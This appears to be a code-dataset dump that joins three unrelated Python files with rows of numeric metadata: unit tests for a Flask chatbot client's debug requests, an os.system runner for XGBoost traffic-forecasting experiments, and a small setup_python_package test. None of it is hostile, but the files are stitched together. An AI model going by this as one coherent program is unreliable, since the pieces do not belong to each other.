bot = client._bot_factory.select_bot()
bot.configuration._version = 'v1.0'
self.assertEqual(True, client.checkBotVersion('v1.0'))
self.assertEqual(False, client.checkBotVersion('v1 0'))
def test_dump_request(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._debug = True
request = unittest.mock.Mock()
response_data = "hello"
latency = 1.0
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.dump_request_response(request, response_data, latency)
request.data = b''
client.dump_request_response(request, response_data, latency)
request.data = b'test'
client.dump_request_response(request, response_data, latency)
def test_ask_question(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._debug = True
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("1234567890", response['userId'])
self.assertEqual("Hello.", response['utterance'])
self.assertEqual("", response['response'])
def test_process_debug_request_variables_name(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.process_request(request)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual(4, len(debugInfo))
self.assertEqual(200, status)
self.assertEqual("value1", debugInfo['conversations']['properties']['testname'])
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_variables_data(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.process_request(request)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "data", "key": "testdata", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual(4, len(debugInfo))
self.assertEqual(200, status)
self.assertEqual("value1", debugInfo['conversations']['data_properties']['testdata'])
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_variables_multi(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.process_request(request)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}, {"type": "data", "key": "testdata", "value": "value2"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual(4, len(debugInfo))
self.assertEqual(200, status)
self.assertEqual("value1", debugInfo['conversations']['properties']['testname'])
self.assertEqual("value2", debugInfo['conversations']['data_properties']['testdata'])
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_no_conversation(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual(0, len(debugInfo))
self.assertEqual(200, status)
def test_process_debug_request_not_server_mode(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
client._server_mode = False
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.process_request(request)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual(3, len(debugInfo))
self.assertEqual(200, status)
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_invalid_variables_type(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"type": "var", "key": "testvar", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual('Invalid variables list format', debugInfo['error'])
self.assertEqual(400, status)
def test_process_debug_request_invalid_variables_parameter(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "variables": [{"var": "test", "value": "value1"}]}'
debugInfo, status = client.process_debug_request(request)
self.assertEqual('Invalid variables list format', debugInfo['error'])
self.assertEqual(400, status)
def test_process_debug_request(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
errors_file = tmp_dir + os.sep + "errors.txt"
duplicates_file = tmp_dir + os.sep + "duplicates.txt"
conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
logs_file = tmp_dir + os.sep + "testrest_testUser.log"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser", "utterance": "Hello"}'
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("testUser", response['userId'])
self.assertEqual("Hello.", response['utterance'])
self.assertEqual("HELLO, WORLD.", response['response'])
self.assertTrue(os.path.exists(errors_file))
self.assertTrue(os.path.exists(duplicates_file))
self.assertTrue(os.path.exists(conversation_file))
self.assertTrue(os.path.exists(logs_file))
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser"}'
debug_info, _ = client.process_debug_request(request)
self.assertTrue('errors' in debug_info)
self.assertTrue('duplicates' in debug_info)
self.assertTrue('conversations' in debug_info)
self.assertTrue('logs' in debug_info)
self.assertTrue('current_conversation' in debug_info)
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_with_logs(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
errors_file = tmp_dir + os.sep + "errors.txt"
duplicates_file = tmp_dir + os.sep + "duplicates.txt"
conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
logs_file = tmp_dir + os.sep + "testrest_testUser.log"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser", "utterance": "LOGS"}'
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("testUser", response['userId'])
self.assertEqual("LOGS.", response['utterance'])
self.assertEqual("Output log.", response['response'])
self.assertTrue(os.path.exists(errors_file))
self.assertTrue(os.path.exists(duplicates_file))
self.assertTrue(os.path.exists(conversation_file))
self.assertTrue(os.path.exists(logs_file))
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser"}'
debug_info, _ = client.process_debug_request(request)
self.assertTrue('errors' in debug_info)
self.assertTrue('duplicates' in debug_info)
self.assertTrue('conversations' in debug_info)
self.assertTrue('logs' in debug_info)
self.assertTrue('current_conversation' in debug_info)
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_with_variables(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
errors_file = tmp_dir + os.sep + "errors.txt"
duplicates_file = tmp_dir + os.sep + "duplicates.txt"
conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
logs_file = tmp_dir + os.sep + "testrest_testUser.log"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser", "utterance": "VARIABLES"}'
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("testUser", response['userId'])
self.assertEqual("VARIABLES.", response['utterance'])
self.assertEqual("Variable datas.", response['response'])
self.assertTrue(os.path.exists(errors_file))
self.assertTrue(os.path.exists(duplicates_file))
self.assertTrue(os.path.exists(conversation_file))
self.assertTrue(os.path.exists(logs_file))
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser"}'
debug_info, _ = client.process_debug_request(request)
self.assertTrue('errors' in debug_info)
self.assertTrue('duplicates' in debug_info)
self.assertTrue('conversations' in debug_info)
self.assertTrue('logs' in debug_info)
self.assertTrue('current_conversation' in debug_info)
self.assertEqual("name_value", debug_info['conversations']['properties']['name_key'])
self.assertEqual("data_value", debug_info['conversations']['data_properties']['data_key'])
question = debug_info['conversations']['questions'][0]
self.assertEqual("var_value", question['var_properties']['var_key'])
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
def test_process_debug_request_no_userid(self):
home_dir = os.path.dirname(__file__) + os.sep + "testdata"
tmp_dir = home_dir + os.sep + "tmp"
errors_file = tmp_dir + os.sep + "errors.txt"
duplicates_file = tmp_dir + os.sep + "duplicates.txt"
conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
logs_file = tmp_dir + os.sep + "testrest_testUser.log"
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
config_file = home_dir + os.sep + "config.yaml"
arguments = MockArgumentParser(config=config_file)
client = FlaskYadlanClient("testrest", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "testUser", "utterance": "Hello"}'
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("testUser", response['userId'])
self.assertEqual("Hello.", response['utterance'])
self.assertEqual("HELLO, WORLD.", response['response'])
self.assertTrue(os.path.exists(errors_file))
self.assertTrue(os.path.exists(duplicates_file))
self.assertTrue(os.path.exists(conversation_file))
self.assertTrue(os.path.exists(logs_file))
request = unittest.mock.Mock()
request.data = b'{}'
debug_info, _ = client.process_debug_request(request)
self.assertTrue('errors' in debug_info)
self.assertTrue('duplicates' in debug_info)
self.assertFalse('conversations' in debug_info)
self.assertFalse('logs' in debug_info)
self.assertFalse('current_conversation' in debug_info)
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
| 39.716876
| 177
| 0.664501
| 3,058
| 28,477
| 6.012753
| 0.081426
| 0.023495
| 0.031326
| 0.051286
| 0.847229
| 0.837276
| 0.822211
| 0.801218
| 0.779192
| 0.773644
| 0
| 0.017428
| 0.216174
| 28,477
| 716
| 178
| 39.772346
| 0.806326
| 0.037293
| 0
| 0.792208
| 0
| 0.012987
| 0.130514
| 0.006276
| 0
| 0
| 0
| 0
| 0.343228
| 1
| 0.070501
| false
| 0
| 0.012987
| 0
| 0.089054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aa3f7210e8dcf07da586492ccc5a8925e3f3f87
| 16,046
|
py
|
Python
|
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | 3
|
2021-06-29T06:18:18.000Z
|
2021-09-07T03:11:35.000Z
|
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
import os
import warnings
warnings.filterwarnings("ignore")
#############################################
# BenchMark Bike
#############################################
#### Chicago
bike_param = {
"closeness_len": 11,
"period_len": 8,
"trend_len": 0,
"max_depth": 4,
"num_boost_round": 35
}
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
#############################################
# BenchMark Metro
#############################################
#### Shanghai
metro_param = {
"closeness_len": 3,
"period_len": 7,
"trend_len": 0,
"max_depth": 5,
"num_boost_round": 50
}
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
#############################################
# BenchMark ChargeStation
#############################################
#### Beijing
cs_param = {
"closeness_len": 12,
"period_len": 7,
"trend_len": 0,
"max_depth": 2,
"num_boost_round": 20
}
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
| 78.273171
| 242
| 0.685716
| 2,141
| 16,046
| 4.759458
| 0.027557
| 0.097743
| 0.105888
| 0.082434
| 0.977625
| 0.97419
| 0.97419
| 0.97419
| 0.968891
| 0.968891
| 0
| 0.010513
| 0.122647
| 16,046
| 204
| 243
| 78.656863
| 0.713312
| 0.004923
| 0
| 0.701389
| 0
| 0
| 0.670238
| 0.002806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6aa459b191f3f13466fe067db160c274a5faed16
| 315
|
py
|
Python
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from setup_python_package.utils.repository_owner_is_python_package_owner import repository_owner_is_python_package_owner
def test_repository_owner_is_python_package_owner():
assert repository_owner_is_python_package_owner("setup-python-package")
assert not repository_owner_is_python_package_owner("numpy")
| 63
| 120
| 0.892063
| 45
| 315
| 5.622222
| 0.311111
| 0.359684
| 0.335968
| 0.454545
| 0.6917
| 0.6917
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060317
| 315
| 5
| 121
| 63
| 0.85473
| 0
| 0
| 0
| 0
| 0
| 0.079114
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
